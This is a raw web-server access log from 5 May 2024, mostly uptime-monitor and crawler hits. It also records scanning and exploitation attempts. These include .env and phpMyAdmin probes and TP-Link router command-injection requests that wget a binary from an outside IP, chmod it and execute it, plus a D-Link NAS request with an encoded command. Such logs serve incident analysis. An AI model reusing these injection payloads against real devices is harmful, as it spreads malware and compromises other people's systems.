212.91.246.72 - - [05/May/2024:09:57:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:09:58:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:09:59:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [05/May/2024:09:59:53 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:10:00:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:01:30 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:02:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:03:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:04:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.116.116 - - [05/May/2024:10:05:08 +0200] "MGLNDD_212.91.246.87_80" 501 338 "-" "-"
51.254.59.113 - - [05/May/2024:10:05:16 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
198.199.116.116 - - [05/May/2024:10:05:23 +0200] "MGLNDD_212.91.246.86_80" 501 338 "-" "-"
179.43.188.106 - - [05/May/2024:10:05:25 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:10:05:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.116.116 - - [05/May/2024:10:05:36 +0200] "MGLNDD_212.91.246.82_80" 501 338 "-" "-"
198.199.116.116 - - [05/May/2024:10:05:38 +0200] "MGLNDD_212.91.246.80_80" 501 338 "-" "-"
185.224.128.43 - - [05/May/2024:10:05:50 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
40.77.167.143 - - [05/May/2024:10:05:55 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
198.199.116.116 - - [05/May/2024:10:06:19 +0200] "MGLNDD_212.91.246.81_80" 501 338 "-" "-"
212.91.246.72 - - [05/May/2024:10:06:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.116.116 - - [05/May/2024:10:06:48 +0200] "MGLNDD_212.91.246.89_80" 501 338 "-" "-"
198.199.116.116 - - [05/May/2024:10:06:49 +0200] "MGLNDD_212.91.246.85_80" 501 338 "-" "-"
198.199.116.116 - - [05/May/2024:10:06:50 +0200] "MGLNDD_212.91.246.88_80" 501 338 "-" "-"
212.91.246.72 - - [05/May/2024:10:07:31 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
198.199.116.116 - - [05/May/2024:10:07:43 +0200] "MGLNDD_212.91.246.83_80" 501 338 "-" "-"
198.199.116.116 - - [05/May/2024:10:08:00 +0200] "MGLNDD_212.91.246.84_80" 501 338 "-" "-"
212.91.246.72 - - [05/May/2024:10:08:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
123.194.3.123 - - [05/May/2024:10:08:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Hello World"
212.91.246.72 - - [05/May/2024:10:09:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:10:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:11:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.62.197.98 - - [05/May/2024:10:11:47 +0200] "\x16\x03\x01" 501 318 "-" "-"
179.43.188.106 - - [05/May/2024:10:12:02 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
65.49.20.68 - - [05/May/2024:10:12:18 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [05/May/2024:10:12:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
137.184.127.188 - - [05/May/2024:10:13:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
137.184.127.188 - - [05/May/2024:10:13:00 +0200] "\x16\x03\x01" 501 318 "-" "-"
137.184.127.188 - - [05/May/2024:10:13:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
137.184.127.188 - - [05/May/2024:10:13:01 +0200] "GET /form.html HTTP/1.1" 404 314 "-" "curl/8.1.2"
137.184.127.188 - - [05/May/2024:10:13:01 +0200] "GET /upl.php HTTP/1.1" 404 312 "-" "Mozilla/5.0"
137.184.127.188 - - [05/May/2024:10:13:02 +0200] "\x16\x03\x01" 501 318 "-" "-"
137.184.127.188 - - [05/May/2024:10:13:02 +0200] "GET /geoip/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
137.184.127.188 - - [05/May/2024:10:13:02 +0200] "GET /favicon.ico HTTP/1.1" 404 316 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
137.184.127.188 - - [05/May/2024:10:13:03 +0200] "GET /1.php HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
137.184.127.188 - - [05/May/2024:10:13:03 +0200] "GET /bundle.js HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
137.184.127.188 - - [05/May/2024:10:13:03 +0200] "GET /files/ HTTP/1.1" 404 311 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
137.184.127.188 - - [05/May/2024:10:13:04 +0200] "GET /systembc/password.php HTTP/1.1" 404 326 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
137.184.127.188 - - [05/May/2024:10:13:04 +0200] "GET /password.php HTTP/1.1" 404 317 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
137.184.127.188 - - [05/May/2024:10:13:04 +0200] "GET /info.php HTTP/1.1" 404 313 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
212.91.246.72 - - [05/May/2024:10:13:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:14:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
164.90.216.146 - - [05/May/2024:10:14:57 +0200] "\x16\x03\x01\x01$\x01" 501 321 "-" "-"
205.210.31.74 - - [05/May/2024:10:15:15 +0200] "GET / HTTP/1.0" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [05/May/2024:10:15:32 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.87 - - [05/May/2024:10:16:31 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.88.90.87 - - [05/May/2024:10:16:31 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [05/May/2024:10:16:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:17:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [05/May/2024:10:17:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:10:18:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:19:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:20:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:21:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:22:33 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:23:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:24:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:25:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:26:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:27:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.64.154.53 - - [05/May/2024:10:27:36 +0200] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 331 "-" "Mozilla/5.0 zgrab/0.x"
170.64.154.53 - - [05/May/2024:10:27:36 +0200] "GET /Pages/log/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
179.43.188.106 - - [05/May/2024:10:27:58 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:10:28:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:29:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
170.64.130.197 - - [05/May/2024:10:29:48 +0200] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 331 "-" "Mozilla/5.0 zgrab/0.x"
170.64.130.197 - - [05/May/2024:10:29:49 +0200] "GET /Pages/log/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [05/May/2024:10:30:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.128.232.229 - - [05/May/2024:10:30:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Linux Gnu (cow)"
195.1.144.109 - - [05/May/2024:10:31:23 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:10:31:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:32:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:33:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:34:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:35:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:36:35 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:37:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:38:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
64.226.121.172 - - [05/May/2024:10:38:42 +0200] "GET /solr/admin/info/system HTTP/1.1" 404 327 "-" "Go-http-client/1.1"
64.226.121.172 - - [05/May/2024:10:38:42 +0200] "GET /solr/admin/cores?action=STATUS&wt=json HTTP/1.1" 404 321 "-" "Go-http-client/1.1"
84.54.51.41 - - [05/May/2024:10:39:21 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+r%3B+wget+http%3A%2F%2F185.216.70.79%2Fr%3B+chmod+777+r%3B+.%2Fr+tplink%3B+rm+-rf+r%60) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
212.91.246.72 - - [05/May/2024:10:39:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:40:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.1.144.109 - - [05/May/2024:10:40:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(cd+/tmp;+rm+-rf+shk;+wget+http://103.14.226.142/shk;+chmod+777+shk;+./shk+tplink;+rm+-rf+shk) HTTP/1.1" 404 331 "-" "Go-http-client/1.1"
185.16.38.111 - - [05/May/2024:10:41:18 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:10:41:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:42:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:43:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:44:36 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [05/May/2024:10:45:05 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:10:45:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:46:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:47:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
103.245.236.120 - - [05/May/2024:10:48:31 +0200] "GET /cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=dW5hbWUJLW0= HTTP/1.1" 404 328 "-" "-"
212.91.246.72 - - [05/May/2024:10:48:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:49:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:50:37 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:51:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
142.93.115.5 - - [05/May/2024:10:52:08 +0200] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 331 "-" "Mozilla/5.0 zgrab/0.x"
142.93.115.5 - - [05/May/2024:10:52:08 +0200] "GET /Pages/log/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [05/May/2024:10:52:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
162.216.150.149 - - [05/May/2024:10:53:19 +0200] "GET / HTTP/1.1" 200 1229 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
212.91.246.72 - - [05/May/2024:10:53:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:54:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
146.190.41.214 - - [05/May/2024:10:54:46 +0200] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 331 "-" "Mozilla/5.0 zgrab/0.x"
146.190.41.214 - - [05/May/2024:10:54:46 +0200] "GET /Pages/log/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
45.128.232.213 - - [05/May/2024:10:55:28 +0200] "\x16\x03\x01" 501 318 "-" "-"
45.128.232.213 - - [05/May/2024:10:55:29 +0200] "\x16\x03\x01" 501 318 "-" "-"
212.91.246.72 - - [05/May/2024:10:55:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.128.232.213 - - [05/May/2024:10:55:48 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
212.91.246.72 - - [05/May/2024:10:56:38 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:57:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:58:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:10:59:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:00:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
52.167.144.236 - - [05/May/2024:11:01:20 +0200] "GET /sitemap_index.xml HTTP/1.1" 404 328 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
179.43.188.106 - - [05/May/2024:11:01:34 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
212.91.246.72 - - [05/May/2024:11:01:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.88.90.87 - - [05/May/2024:11:02:35 +0200] "GET /.env HTTP/1.1" 404 309 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
45.88.90.87 - - [05/May/2024:11:02:35 +0200] "POST / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
212.91.246.72 - - [05/May/2024:11:02:39 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:03:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
179.43.188.106 - - [05/May/2024:11:04:12 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
138.197.15.3 - - [05/May/2024:11:04:26 +0200] "GET /Temporary_Listen_Addresses HTTP/1.1" 404 331 "-" "Mozilla/5.0 zgrab/0.x"
138.197.15.3 - - [05/May/2024:11:04:26 +0200] "GET /Pages/log/ HTTP/1.1" 404 315 "-" "Mozilla/5.0 zgrab/0.x"
212.91.246.72 - - [05/May/2024:11:04:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:05:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:06:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:07:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [05/May/2024:11:08:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
46.23.108.242 - - [05/May/2024:11:08:56 +0200] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:56 +0200] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:56 +0200] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:56 +0200] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:56 +0200] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:56 +0200] "GET /muieblackcat HTTP/1.1" 404 317 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:56 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:56 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:56 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:56 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:57 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:58 +0200] "GET //phpMyAdmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:58 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:58 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:58 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:58 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:58 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:58 +0200] "GET //phpmyadmin/scripts/setup.php HTTP/1.1" 404 333 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:58 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:58 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:58 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:58 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:59 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
46.23.108.242 - - [05/May/2024:11:08:59 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //pma/scripts/setup.php HTTP/1.1" 404 326 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //myadmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
46.23.108.242 - - [05/May/2024:11:09:00 +0200] "GET //MyAdmin/scripts/setup.php HTTP/1.1" 404 330 "-" "-"
